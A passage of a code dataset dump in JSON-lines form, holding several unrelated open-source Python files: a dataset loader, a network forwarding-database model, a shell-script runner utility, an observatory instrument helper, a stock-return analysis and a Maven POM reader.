loadmat('./data/svhn_train_32x32.mat')\n test_data = loadmat('./data/svhn_test_32x32.mat')\n \n #transform train data\n train_images = train_data['X']\n train_images = train_images.transpose((3,0,1,2))\n train_labels = train_data['y']\n train_labels = train_labels[:,0]\n train_labels[train_labels == 10] = 0\n train_labels_hot = indices_to_one_hot(train_labels.astype(int), 10)\n \n #transform test dat\n test_images = test_data['X']\n test_images = test_images.transpose((3,0,1,2))\n test_labels = test_data['y']\n test_labels = test_labels[:,0]\n test_labels[test_labels == 10] = 0\n test_labels_hot = indices_to_one_hot(test_labels.astype(int), 10)\n \n if hot == True:\n return train_images, train_labels_hot, test_images, test_labels_hot\n else:\n return train_images, train_labels, test_images, test_labels\ndef rgb2gray(images):\n return np.expand_dims(np.dot(images, [0.2990, 0.5870, 0.1140]), axis=3)","repo_name":"ElinaBian/Domain_Adaptation","sub_path":"data_process/svhn_data.py","file_name":"svhn_data.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"15911082593","text":"from finn.components.Box import Box\nimport finn.Color as Color\n\n\nclass CloseButton(Box):\n def __init__(self, position, width=32):\n super(CloseButton, self).__init__(rect=(position[0], position[1], width, width),\n box_color=Color.d_gray,\n border_color=Color.l_gray,\n highlight_color=Color.white,\n border=3,\n name=\"close\")\n","repo_name":"bearhockey/beer","sub_path":"src/obj/close_button.py","file_name":"close_button.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17621422313","text":"from Products.ZenUtils.Utils import getSubObjects\n\nfrom Products.ZenUtils.ZCmdBase import ZCmdBase\nfrom transaction import get_transaction\n\nclass FixIps(ZCmdBase):\n\n def fixips(self):\n ips = getSubObjects(self.dmd, self.filter, self.decend)\n self.ccount = 0\n for ip in ips:\n self.log.debug(\"fixing ip %s\", ip.id)\n int = ip.interface()\n if int:\n ip.removeRelation(\"interface\")\n ip.addRelation(\"interface\", int)\n self.ccount += 1\n if (self.ccount >= self.options.commitCount \n and not self.options.noCommit):\n self.mycommit(ip)\n if self.options.noCommit:\n self.log.info(\"not commiting any changes\")\n else:\n self.mycommit()\n\n\n def filter(self, obj):\n return obj.meta_type == \"IpAddress\"\n\n\n def decend(self, obj):\n return (obj.meta_type == \"IpNetwork\" or \n (obj.meta_type == \"To Many Relationship\" and \n (obj.id == \"subnetworks\" or obj.id == \"ipaddresses\")))\n\n\n def mycommit(self, ip=None):\n if not ip:\n ipname = \"all\"\n else:\n ipname = ip.id\n self.log.info('commiting group of ips ending with %s', ipname)\n trans = get_transaction()\n trans.note('FixIps reconnect ips')\n trans.commit()\n self.ccount = 0\n\n \n def buildOptions(self):\n ZCmdBase.buildOptions(self)\n self.parser.add_option('-x', '--commitCount',\n dest='commitCount',\n default=20,\n type=\"int\",\n help='how many lines should be loaded before commit')\n\n self.parser.add_option('-n', '--noCommit',\n dest='noCommit',\n action=\"store_true\",\n default=0,\n help='Do not store changes to the Dmd (for debugging)')\n\n\nif __name__ == \"__main__\":\n fips = FixIps()\n fips.fixips()\n","repo_name":"zenoss/zenoss-prodbin","sub_path":"Products/ZenUtils/FixIps.py","file_name":"FixIps.py","file_ext":"py","file_size_in_byte":2015,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"} +{"seq_id":"74485423235","text":"\nimport ktl\nimport sys\nimport logging as lg\nimport sys, os\nimport time\nimport subprocess\nfrom subprocess import PIPE\n\ndef setupMonitoring(keywords, wait=True):\n\n for key in keywords:\n key.monitor()\n\n if wait == False:\n return\n else:\n checkInitialValues(keywords)\n\ndef checkInitialValues(keywords):\n\n for keyword in keywords:\n keyword.wait(timeout=1)\n if keyword['populated'] == False:\n raise RuntimeError('Keyword %s is not available. The server might be offline.' % (keyword.full_name))\n\ndef say(message):\n sys.stdout.write(message + '\\n')\n sys.stdout.flush()\n\ndef sleepdots(seconds):\n i = 0\n while i < seconds:\n i += 1\n sys.stdout.write(\".\")\n sys.stdout.flush()\n time.sleep(1)\n\n sys.stdout.write('\\n')\n\n\ndef isServerUp(server):\n p = subprocess.Popen(['show -s '+server+' uptime'], stderr = PIPE, shell=True, stdout=PIPE)\n output = p.communicate()\n if \"Failed to create RPC client\" in output[1]:\n return False\n else:\n say(\"Server %s is up\" % (server))\n return True\n\n\n\n\n\ndef checkIfMoveIsPossible(statusKeyword):\n\n # if the status keyword is in error, do not attempt the move\n if statusKeyword.ascii.split(' ')[0] in ['Error:', 'Moving:','Error','Moving']:\n lg.error(\"kcwiServer: Cannot execute requested move. Status is '%s'\" % (statusKeyword))\n raise RuntimeError(\"Cannot start requested move. Status is %s\" % (statusKeyword))\n\ndef changeMoveMode(movemode,mode):\n\n if mode in [0,1]:\n movemode.write(mode)\n else:\n raise ValueError(\"resetMoveMode called with wrong argument (mode=%s)\" % (mode))\n\ndef checkSuccess(statusKeyword=None, mechanism=None, targetReachedExpression=None, successStatus=None):\n\n if targetReachedExpression==None:\n result = True\n else:\n result = targetReachedExpression.evaluate()\n statusString = statusKeyword.ascii.split(' ')[0]\n if result == False or statusString != successStatus:\n lg.info(\"kcwiServer: %s move failed. Status is %s\" % (mechanism, statusKeyword.ascii))\n raise RuntimeError(\"kcwiServer: %s move failed. Status is %s\" % (mechanism, statusKeyword.ascii))\n\n\n\ndef get_terminal_width():\n command = ['tput','cols']\n try:\n width = int(subprocess.check_output(command))\n except OSError as e:\n print(\"Invalid command '{0]': exit status ({1})\".format(command[0],e.errno))\n except subprocess.CalledProcessError as e:\n print(\"Command '{0}' returned non-zero exit status: ({1})\".format(command, e.returncode))\n else:\n return width\n\n\nclass ProgressBar(object):\n \"\"\"ProgressBar class holds the options of the progress bar.\n The options are:\n start State from which start the progress. For example, if start is\n 5 and the end is 10, the progress of this state is 50%\n end State in which the progress has terminated.\n width --\n fill String to use for \"filled\" used to represent the progress\n blank String to use for \"filled\" used to represent remaining space.\n format Format\n incremental\n \"\"\"\n def __init__(self, start=0, end=10, width=12, fill='=', blank='.', format='[%(fill)s>%(blank)s] %(progress)s%%', incremental=True):\n super(ProgressBar, self).__init__()\n\n self.start = start\n self.end = end\n #sz = os.get_terminal_size()\n try:\n self.width = get_terminal_width()-10\n except:\n say(\"Cannot determine terminal width. Using standard width.\")\n self.width=width\n #self.width = width\n self.fill = fill\n self.blank = blank\n self.format = format\n self.incremental = incremental\n self.step = 100 / float(self.width) #fix\n self.reset()\n\n def __add__(self, increment):\n increment = self._get_progress(increment)\n if 100 > self.progress + increment:\n self.progress += increment\n else:\n self.progress = 100\n return self\n\n def __str__(self):\n progressed = int(self.progress / self.step) #fix\n fill = progressed * self.fill\n blank = (self.width - progressed) * self.blank\n return self.format % {'fill': fill, 'blank': blank, 'progress': int(self.progress)}\n\n __repr__ = __str__\n\n def _get_progress(self, increment):\n return float(increment * 100) / self.end\n\n def reset(self):\n \"\"\"Resets the current progress to the start point\"\"\"\n self.progress = self._get_progress(self.start)\n return self\n\nclass AnimatedProgressBar(ProgressBar):\n \"\"\"Extends ProgressBar to allow you to use it straighforward on a script.\n Accepts an extra keyword argument named `stdout` (by default use sys.stdout)\n and may be any file-object to which send the progress status.\n \"\"\"\n def __init__(self, *args, **kwargs):\n super(AnimatedProgressBar, self).__init__(*args, **kwargs)\n self.stdout = kwargs.get('stdout', sys.stdout)\n self.disable=False\n\n def show_progress(self):\n if self.disable==True:\n return\n if hasattr(self.stdout, 'isatty') and self.stdout.isatty():\n self.stdout.write('\\r')\n else:\n self.stdout.write('\\n')\n self.stdout.write(str(self))\n self.stdout.flush()\n\ndef ProgressCallback(keyword,value,instance):\n #value = int(keyword['bin'])\n if instance.progress == 0 and int(value)==100:\n return\n instance.progress=int(value)\n instance.show_progress()\n # this produces the final new line\n if instance.progress == 100:\n # this deals with cases in which the \"100%\" is broadcast multiple times\n if instance.disable==False:\n sys.stdout.write(\"\\n\")\n instance.disable=True\n\n\ndef NullCallback(keyword,value,data):\n return\n","repo_name":"KeckObservatory/kcwi_python","sub_path":"lib/1.0/Helper.py","file_name":"Helper.py","file_ext":"py","file_size_in_byte":5874,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"4025976643","text":"import logging\nimport time\n\nDEFAULT_AGE = 300\n\n\nclass FDBEntry(object):\n '''FDB Entry'''\n def __init__(self, mac, vlan, source, dst_ports=None, age=DEFAULT_AGE):\n # pylint: disable=too-many-instance-attributes\n # pylint: disable=too-many-arguments\n self._mac = mac\n self._source = source\n self._dst_ports = dst_ports\n self._is_broadcast = is_bmcast(mac)\n self._vlan = vlan\n self._age = age\n self.last_seen = 0 # this one needs to be public for testing\n self.refresh()\n\n @property\n def ports(self):\n '''Port list to direct traffic to.'''\n return self._dst_ports\n\n @property\n def mac(self):\n '''MAC for this fdb entry'''\n return self._mac\n\n @property\n def is_broadcast(self):\n '''Is this Broadcast or Multicast'''\n return self._is_broadcast\n\n @property\n def vlan(self):\n '''vlan for this fdb entry'''\n return self._vlan\n\n @property\n def source(self):\n '''Source port for this fdb entry'''\n return self._source\n\n def refresh(self):\n '''Refresh this entry'''\n self.last_seen = time.time()\n self._expiry = self.last_seen + self._age\n\n def add_port(self, dst_port):\n '''Add a dst port'''\n try:\n self._dst_ports.index(dst_port)\n except ValueError:\n self._dst_ports.append(dst_port)\n\n def del_port(self, dst_port):\n '''Add a dst port'''\n try:\n self._dst_ports.remove(dst_port)\n except ValueError:\n pass\n\n\nclass FDB(object):\n '''A python representation of the linux bridge forwarding\n database. By default reads from sysfs and expects a linux\n bridge instance. Read methods can be overriden to support\n other backends.'''\n def __init__(self):\n self._records = {}\n\n def get_entry(self, mac, vlan):\n '''Get entry from fdb for this mac - note that a mac can be\n present on any number of vlans, thus you need to hash\n on mac + vlan'''\n return self._records[\"{}-{}\".format(vlan, mac)]\n\n def add_entry(self, entry):\n '''Add entry from fdb for this mac - note that a mac can be\n present on any number of vlans, thus you need to hash\n on mac + vlan'''\n self._records[\"{}-{}\".format(entry.vlan, entry.mac)] = entry\n\n def delete_entry(self, entry):\n '''Delete entry from fdb for this mac - note that a mac can be\n present on any number of vlans, thus you need to hash\n on mac + vlan'''\n del self._records[\"{}-{}\".format(entry.vlan, entry.mac)]\n\n def del_mcast(self, mac, vlan, port):\n '''Remove a Multicast fdb entry'''\n try:\n old = self.get_entry(mac, vlan)\n try:\n new = FDBEntry(mac, vlan, None, dst_ports=old.ports)\n new.ports.remove(port)\n self.delete_entry(old)\n self.add_entry(new)\n vlan.replace(old, new)\n except ValueError:\n return\n except KeyError:\n pass\n\n def add_mcast(self, mac, vlan, port):\n '''Add a Multicast fdb entry'''\n try:\n old = self.get_entry(mac, vlan)\n try:\n old.ports.index(port)\n return\n except ValueError:\n new = FDBEntry(mac, vlan, None, dst_ports=old.ports + port)\n self.delete_entry(old)\n self.add_entry(new)\n vlan.replace(old, new)\n except KeyError:\n entry = FDBEntry(mac, vlan, None, dst_ports=[port])\n self.add_entry(entry)\n vlan.add(entry)\n\n def learn(self, mac, vlan, source_port):\n '''Add or refresh a mac'''\n try:\n old = self.get_entry(mac, vlan)\n if old.source == source_port:\n old.refresh()\n vlan.refresh(old)\n else:\n self.delete_entry(old)\n new = FDBEntry(mac, vlan, source_port)\n self.add_entry(new)\n vlan.replace(old, new)\n except KeyError:\n entry = FDBEntry(mac, vlan, source_port)\n self.add_entry(entry)\n vlan.add(entry)\n\n def expire(self, mac, vlan):\n '''Delete Mac'''\n try:\n entry = self.get_entry(mac, vlan)\n if entry.vlan is not None:\n vlan.delete(entry)\n self.delete_entry(entry)\n except KeyError:\n logging.error(\"tried to delete inexistent mac %s on vlan %s\", mac, vlan)\n\n\ndef is_bmcast(mac):\n '''Is the mac broadcast or multicast. As a\n side effect, validates and parses the mac'''\n\n digits = mac.split(\":\")\n if len(digits) != 6:\n raise ValueError\n for digit in digits:\n hex_form = int(digit, 16)\n if hex_form < 0 or hex_form > 0xff:\n raise ValueError\n return (int(digits[0], 16) & 1) == 1\n","repo_name":"kot-begemot-uk/bess_switch","sub_path":"fdb.py","file_name":"fdb.py","file_ext":"py","file_size_in_byte":5006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34740033556","text":"from utils import *\r\n\r\n\r\ndef ensure_no_dups(curr_filtered_df, isDoc, file_name):\r\n if isDoc and (len(set(curr_filtered_df.database)) > 1 or len(set(curr_filtered_df.topic)) > 1):\r\n print(f\"Document {file_name} is associated to more than one topic/database\")\r\n exit()\r\n if not isDoc and len(set(curr_filtered_df.database)) > 1:\r\n print(f\"topic {file_name} is associated to more than one database\")\r\n exit()\r\n\r\n\r\ndef save_json_file(df, helper_dir, isDoc):\r\n\r\n file_name_col = 'documentFile' if isDoc else \"topic\"\r\n sent_ind_col = 'docSentCharIdx' if isDoc else \"scuSentCharIdx\"\r\n\r\n filtered_df = df.drop_duplicates(subset=[file_name_col, sent_ind_col])\r\n\r\n for file_name in set(filtered_df[file_name_col]):\r\n curr_filtered_df = filtered_df.loc[filtered_df[file_name_col] == file_name]\r\n curr_filtered_df = curr_filtered_df.sort_values(by=[sent_ind_col])\r\n ensure_no_dups(curr_filtered_df, isDoc, file_name)\r\n\r\n database = str(int(list(curr_filtered_df.database)[0]))\r\n topic = list(curr_filtered_df.topic)[0]\r\n\r\n\r\n if isDoc:\r\n create_dir([helper_dir, \"jsons_files\", \"documents\", database, topic])\r\n out_json_file = os.path.join(helper_dir, \"jsons_files\", \"documents\", database, topic, f\"{file_name}.json\")\r\n else:\r\n create_dir([helper_dir, \"jsons_files\", \"summaries\", database])\r\n out_json_file = os.path.join(helper_dir, \"jsons_files\", \"summaries\", database, f\"{file_name}.json\")\r\n\r\n with open(out_json_file, 'w') as fp:\r\n num_row = curr_filtered_df.shape[0]\r\n for i, row in curr_filtered_df.iterrows():\r\n curr_sent = row[\"docSentText\"] if isDoc else row[\"scuSentence\"]\r\n curr_sent_ind = row[sent_ind_col]\r\n json.dump({\"sentence\": curr_sent, \"sent_index\": curr_sent_ind}, fp)\r\n if i != num_row - 1:\r\n fp.write(\"\\n\")\r\n\r\n\r\ndef save_json_file_wrapper(df, helper_dir):\r\n save_json_file(df, helper_dir, True) # documents\r\n save_json_file(df, helper_dir, False) # summaries\r\n\r\n\r\ndef main(args):\r\n indir = args.indir\r\n\r\n helper_dir = os.path.join(os.path.dirname(indir), HELPER_DIR_NAME)\r\n\r\n\r\n df = pd.read_csv(indir)\r\n save_json_file_wrapper(df, helper_dir)\r\n print(f'done saving sentences to json files in {os.path.join(helper_dir, \"QAs\", \"combined\")}')\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n argparser = argparse.ArgumentParser(description=\"\")\r\n argparser.add_argument(\"-i\", \"--indir\", required=True, help=\"path to train_full_details_with_oies_no_duplications.csv\")\r\n main(argparser.parse_args())","repo_name":"lovodkin93/automatic_aligned_QASem_spans","sub_path":"retrain_superPal_preprocess/get_jsons.py","file_name":"get_jsons.py","file_ext":"py","file_size_in_byte":2674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16191566198","text":"import subprocess\nimport tempfile\nimport shutil\nimport signal\nimport os\nimport time\nimport random\nimport atexit\nfrom typing import Optional, List, Any\nfrom ._preventkeyboardinterrupt import PreventKeyboardInterrupt\nfrom ._daemon_connection import _kachery_temp_dir\n\n_running_scripts = {}\n\nclass ShellScript():\n def __init__(self, script: str, script_path: Optional[str]=None, keep_temp_files: bool=False, verbose: bool=False, label='', redirect_output_to_stdout=False):\n self._script_path = script_path\n self._keep_temp_files = keep_temp_files\n self._process: Optional[subprocess.Popen] = None\n self._files_to_remove: List[str] = []\n self._dirs_to_remove: List[str] = []\n self._start_time: Optional[float] = None\n self._verbose = verbose\n self._label = label\n self._redirect_output_to_stdout = redirect_output_to_stdout\n self._script_id = _random_string(10)\n\n lines = script.splitlines()\n lines = self._remove_initial_blank_lines(lines)\n if len(lines) > 0:\n num_initial_spaces = self._get_num_initial_spaces(lines[0])\n for ii, line in enumerate(lines):\n if len(line.strip()) > 0:\n n = self._get_num_initial_spaces(line)\n if n < num_initial_spaces:\n print(script)\n raise Exception('Problem in script. First line must not be indented relative to others')\n lines[ii] = lines[ii][num_initial_spaces:]\n self._script = '\\n'.join(lines)\n\n def substitute(self, old: str, new: Any) -> None:\n self._script = self._script.replace(old, '{}'.format(new))\n\n def write(self, script_path: Optional[str]=None) -> None:\n if script_path is None:\n script_path = self._script_path\n if script_path is None:\n raise Exception('Cannot write script. No path specified')\n with open(script_path, 'w', newline='\\n') as f:\n f.write(self._script)\n os.chmod(script_path, 0o744)\n\n def start(self) -> None:\n if self._script_path is not None:\n script_path = self._script_path\n else:\n tempdir = tempfile.mkdtemp(prefix='tmp_shellscript_', dir=_kachery_temp_dir())\n script_path = os.path.join(tempdir, 'script.sh')\n self._dirs_to_remove.append(tempdir) \n self.write(script_path)\n cmd = script_path\n if self._verbose:\n print('RUNNING SHELL SCRIPT: ' + cmd)\n self._start_time = time.time()\n _running_scripts[self._script_id] = self\n if self._redirect_output_to_stdout:\n self._process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n else:\n self._process = subprocess.Popen(cmd)\n\n def wait(self, timeout=None) -> Optional[int]:\n timeout_increment = 0.01\n if timeout is None or (timeout > timeout_increment):\n timer = time.time()\n while True:\n retcode = self.wait(timeout=timeout_increment)\n if retcode is not None:\n self._cleanup()\n return retcode\n if timeout is not None:\n elapsed = time.time() - timer\n if elapsed > timeout:\n return None\n\n if not self.isRunning():\n self._print_stdout()\n self._cleanup()\n return self.returnCode()\n assert self._process is not None, \"Unexpected self._process is None even though it is running.\"\n try:\n retcode = self._process.wait(timeout=timeout)\n except:\n retcode = None\n finally:\n self._print_stdout()\n if retcode is not None:\n self._cleanup()\n return retcode\n \n def _print_stdout(self):\n if not self._redirect_output_to_stdout:\n return\n if self._process is None:\n return\n for line in self._process.stdout:\n if isinstance(line, bytes):\n line = line.decode('utf-8')\n print(line)\n\n def _cleanup(self) -> None:\n try:\n if not hasattr(self, '_dirs_to_remove'):\n return\n if self._keep_temp_files:\n return\n for dirpath in self._dirs_to_remove:\n _rmdir_with_retries(dirpath, num_retries=5)\n except:\n print('WARNING: Problem in cleanup() of ShellScript')\n finally:\n if self._script_id in _running_scripts:\n del _running_scripts[self._script_id]\n\n def stop(self) -> None:\n with PreventKeyboardInterrupt():\n if not self.isRunning():\n return\n assert self._process is not None, \"Unexpected self._process is None even though it is running.\"\n\n try:\n signals = [signal.SIGINT, signal.SIGINT, signal.SIGINT] + [signal.SIGTERM, signal.SIGTERM, signal.SIGTERM] + [signal.SIGKILL]\n signal_strings = ['SIGINT', 'SIGINT', 'SIGINT'] + ['SIGTERM', 'SIGTERM', 'SIGTERM'] + ['SIGKILL']\n delays = [5, 5, 5] + [5, 5, 5] + [1]\n\n for iis in range(len(signals)):\n self._process.send_signal(signals[iis])\n try:\n self._process.wait(timeout=delays[iis])\n return\n except:\n pass\n finally:\n self._cleanup()\n\n def kill(self) -> None:\n if not self.isRunning():\n return\n \n assert self._process is not None, \"Unexpected self._process is None even though it is running.\"\n self._process.send_signal(signal.SIGKILL)\n try:\n self._process.wait(timeout=1)\n except:\n print('WARNING: unable to kill shell script.')\n pass\n\n def stopWithSignal(self, sig, timeout) -> bool:\n if not self.isRunning():\n return True\n \n assert self._process is not None, \"Unexpected self._process is None even though it is running.\"\n self._process.send_signal(sig)\n try:\n self._process.wait(timeout=timeout)\n return True\n except:\n return False\n\n def elapsedTimeSinceStart(self) -> Optional[float]:\n if self._start_time is None:\n return None\n \n return time.time() - self._start_time\n\n def isRunning(self) -> bool:\n if not self._process:\n return False\n retcode = self._process.poll()\n if retcode is None:\n return True\n return False\n\n def isFinished(self) -> bool:\n if not self._process:\n return False\n return not self.isRunning()\n\n def returnCode(self) -> Optional[int]:\n if not self.isFinished():\n raise Exception('Cannot get return code before process is finished.')\n assert self._process is not None, \"Unexpected self._process is None even though it is finished.\"\n return self._process.returncode\n\n def scriptPath(self) -> Optional[str]:\n return self._script_path\n\n def _remove_initial_blank_lines(self, lines: List[str]) -> List[str]:\n ii = 0\n while ii < len(lines) and len(lines[ii].strip()) == 0:\n ii = ii + 1\n return lines[ii:]\n\n def _get_num_initial_spaces(self, line: str) -> int:\n ii = 0\n while ii < len(line) and line[ii] == ' ':\n ii = ii + 1\n return ii\n \n @staticmethod\n def test():\n _test_shellscript()\n\ndef stop_all_scripts():\n x = list(_running_scripts.values())\n for s in x:\n s.stop()\n\ndef _random_string(num_chars: int) -> str:\n chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'\n return ''.join(random.choice(chars) for _ in range(num_chars))\n\ndef _rmdir_with_retries(dirname, num_retries, delay_between_tries=1):\n for retry_num in range(1, num_retries + 1):\n if not os.path.exists(dirname):\n return\n try:\n shutil.rmtree(dirname)\n break\n except: # pragma: no cover\n if retry_num < num_retries:\n print('Retrying to remove directory: {}'.format(dirname))\n time.sleep(delay_between_tries)\n else:\n raise Exception('Unable to remove directory after {} tries: {}'.format(num_retries, dirname))\n\n# def _test_error_handling_1():\n# import pytest\n# with pytest.raises(Exception):\n# ShellScript(\"\"\"\n# #/bin/bash\n# echo \"bad indent\"\n# \"\"\")\n \n# ss = ShellScript(\"\"\"\n# #!/bin/bash\n\n# sleep 15\n# \"\"\")\n# assert ss.elapsedTimeSinceStart() is None\n# assert ss.isRunning() == False\n# assert ss.isFinished() == False\n# ss.start()\n# assert ss.isRunning() == True\n# assert ss.isFinished() == False\n# with pytest.raises(Exception):\n# ## cannot get return code while running\n# ss.returnCode()\n# ss.stop()\n# assert ss.elapsedTimeSinceStart() < 10\n\n# ss.start()\n# ss.kill()\n# assert ss.elapsedTimeSinceStart() < 10\n\n# # it's okay to stop it if it isn't running\n# assert ss.stop() is None\n# assert ss.kill() is None\n# assert ss.stopWithSignal(signal.SIGINT, timeout=1) == True\n\n# for sig in [signal.SIGINT, signal.SIGTERM, signal.SIGKILL]:\n# ss.start()\n# assert ss.isRunning() == True\n# ss.stopWithSignal(sig, timeout=0.1)\n# assert ss.isRunning() == False\n# assert ss.elapsedTimeSinceStart() < 10\n\ndef _test_coverage():\n from ._temporarydirectory import TemporaryDirectory\n with TemporaryDirectory() as tmpdir:\n _rmdir_with_retries(dirname=tmpdir + '/does-not-exist', num_retries=1)\n\ndef _test_shellscript():\n from ._temporarydirectory import TemporaryDirectory\n with TemporaryDirectory() as tmpdir:\n fname = tmpdir + '/file1.txt'\n text0 = 'some-test-text'\n ss = ShellScript(f\"\"\"\n #!/bin/bash\n\n echo \"{text0}\" > {fname}\n \"\"\")\n ss.start()\n ss.wait(timeout=5)\n with open(fname, 'r') as f:\n txt = str(f.read())\n print(f'txt = {txt}')\n assert txt == text0 + '\\n'\n assert ss.returnCode() == 0\n print(f'Script path: {ss.scriptPath()}')\n \n # _test_error_handling_1()\n _test_coverage()\n\natexit.register(stop_all_scripts)","repo_name":"flatironinstitute/kachery-p2p","sub_path":"kachery_p2p/_shellscript.py","file_name":"_shellscript.py","file_ext":"py","file_size_in_byte":10532,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"41826951471","text":"from math import floor\ntournaments = int(input())\nstarting_points = int(input())\npoints = 0\ntotal_points = 0\nw = 0\naverage = 0\nfor i in range(1, tournaments + 1):\n result = input()\n if result == \"W\":\n w += 1\n points += 2000\n elif result == \"F\":\n points += 1200\n elif result == \"SF\":\n points += 720\naverage = floor(points / tournaments)\ntotal_points = points + starting_points\nw_p = w / tournaments * 100\nprint(f\"Final points: {total_points}\")\nprint(f\"Average points: {average}\")\nprint(f\"{w_p:.2f}%\")\n\n","repo_name":"GeorgiZdravchev/SoftUni","sub_path":"programing_fundamentals/week4/tennis_ranklist.py","file_name":"tennis_ranklist.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23256477224","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport os \nos.chdir(r\"C:\\Users\\skytr\\OneDrive\\문서\\PythonBasic\\csv\\stock analysis\\stocks\")\nstocks = os.listdir()\nprint(stocks)\nr = lambda x : x.astype(float)\n# major_index = ('Date', 'Prev_ror_x','ror_day_x','Prev_Close_x','Open_x','Close_x','rate_of_return_x')\ndef create_df(name_of_stock_csv):\n df = pd.read_csv(name_of_stock_csv)\n x = r(df['Open'])\n y = r(df['Close'])\n df['rate_of_return'] = (y - x)*100/x\n df['diff'] = y - x\n df['hl_diff'] = r(df['High']) - r(df['Low']) \n df = df.sort_values(by='Date', ascending=True)\n # 전날의 종가\n df['Prev_Close'] = df['Close'].shift(1) \n df['Prev_ror'] = df['rate_of_return'].shift(1) \n df['ror_day'] = (df['Open']-df['Prev_Close'])*100/df['Prev_Close'] # 전날 종가 대비 다음날 시가 수익률\n df.columns = ['Date']+[col + \"_\"+name_of_stock_csv[:-4] for col in df.columns if col != \"Date\"]\n return df\n\ndf = create_df(stocks[0]) \n\nfor i in stocks[1:]:\n df = pd.merge(df,create_df(i), on=\"Date\")\n \nprint(df.head())\n# df = pd.merge(create_df('SOXL'), create_df('SOXS'), on=\"Date\" )\n\n# print(df.sort_values(by=\"rate_of_return\", ascending=False))\ndf.to_clipboard()\n\n#plt.plot(df['ror_day_x'][-50:],df['rate_of_return_y'][:50], '*') \n#plt.xticks(rotation=45)\n\n# plt.show()\n# 전날 수익 3% 이상 나고, 시가-종가 수익률 0보다 클때\n# print(df[(df['Prev_ror_x'] > 3) &(df['ror_day_x'] > 0)].sort_values(by='rate_of_return_x', ascending=False).loc[:, major_index][:10])\n# tot = len(df)\n# num = len(df[df['rate_of_return_x']> 0 ])\n# num_2 = len(df[(df['rate_of_return_x']> 2) & (df['Prev_ror_x']> 2) ])\n# num_plusplus = len(df[(df['rate_of_return_x']> 2) & (df['Prev_ror_x']> 3)& (df['ror_day_x']> 0) ])\n\n# num3 = len(df[df['rate_of_return_x']> 3 ])\n\n# ynum_2 = len(df[(df['rate_of_return_y']> 2) & (df['Prev_ror_y']> 2) ])\n# print(f'총거래: {len(df)}') \n# print(f'soxl + 확률: {round(num*100/tot,2) }') \n\n# print(f'이틀 연속 soxl+2 + 확률: {round(num_2*100/tot,2)} 전날 2%이상 오르고 오늘 또 2%이상 오름') \n\n# print(f'soxl\\n전날수익률3+종가수익률+/오늘 수익률+2 : {round(num_plusplus*100/num,2)} 위와 같음') \n\n","repo_name":"skytreesea/PythonBasic","sub_path":"csv/stock analysis/stock_analysis_sox_ver1.py","file_name":"stock_analysis_sox_ver1.py","file_ext":"py","file_size_in_byte":2228,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"26334235343","text":"import xml.etree.ElementTree as XmlTree\nfrom pathlib import Path\nfrom typing import Optional, List\n\nfrom common._maven_module.maven_module_reader_configuration import MavenModuleReaderConfiguration, IgnoredMavenModule, \\\n IgnoredPom\nfrom common.maven_module import MavenModule\nfrom common.release_audience import ReleaseAudience\nfrom common.release_maturity import ReleaseMaturity\n\n\nclass ModuleAttributesMissingException(Exception):\n def __init__(self, pom_file: Path, missing_attributes: List[str]):\n self._pom_file: Path = pom_file\n self._missing_attributes: List[str] = missing_attributes\n\n def __repr__(self) -> str:\n return str(self)\n\n def __str__(self) -> str:\n joined: str = \", \".join(self._missing_attributes)\n return f\"Following attributes are missing in \\\"{self._pom_file.resolve()}\\\": {joined}\"\n\n\nclass ExceptionCollection(Exception):\n def __init__(self):\n self.exceptions: List[Exception] = []\n\n def append(self, exception: Exception) -> \"ExceptionCollection\":\n self.exceptions.append(exception)\n return self\n\n def __repr__(self) -> str:\n return str(self)\n\n def __str__(self) -> str:\n return \"\\n\".join(str(exception) for exception in self.exceptions)\n\n\nclass MavenModuleReader:\n @staticmethod\n def read(pom_file: Path,\n reader_config: Optional[MavenModuleReaderConfiguration] = None,\n verbose: bool = False) -> Optional[MavenModule]:\n return MavenModuleReader(pom_file, reader_config, verbose).get_module()\n\n @staticmethod\n def read_recursively(root: Path,\n reader_config: Optional[MavenModuleReaderConfiguration] = None,\n verbose: bool = False) -> List[MavenModule]:\n return MavenModuleReader._read_recursively(root, root, reader_config, verbose)\n\n @staticmethod\n def _read_recursively(root: Path,\n current_path: Path,\n reader_config: Optional[MavenModuleReaderConfiguration] = None,\n verbose: bool = False) -> List[MavenModule]:\n if current_path.is_file():\n if current_path.name == \"pom.xml\":\n module: Optional[MavenModule] = MavenModuleReader.read(current_path, reader_config, verbose)\n if module is not None:\n module._pom_file = module.pom_file.relative_to(root)\n return [module]\n\n return []\n\n modules: List[MavenModule] = []\n exception_collection: ExceptionCollection = ExceptionCollection()\n for path in current_path.iterdir():\n try:\n modules.extend(MavenModuleReader._read_recursively(root, path, reader_config, verbose))\n\n except ExceptionCollection as e:\n exception_collection.exceptions.extend(e.exceptions)\n\n except ModuleAttributesMissingException as e:\n exception_collection.exceptions.append(e)\n\n if len(exception_collection.exceptions) > 0:\n raise exception_collection\n\n return modules\n\n def __init__(self,\n pom_file: Path,\n reader_config: Optional[MavenModuleReaderConfiguration] = None,\n verbose: bool = False):\n self._group_id: Optional[str] = None\n self._artifact_id: Optional[str] = None\n self._packaging: Optional[str] = None\n self._release_audience: Optional[ReleaseAudience] = None\n self._release_maturity: Optional[ReleaseMaturity] = None\n self._pom_file: Path = pom_file\n 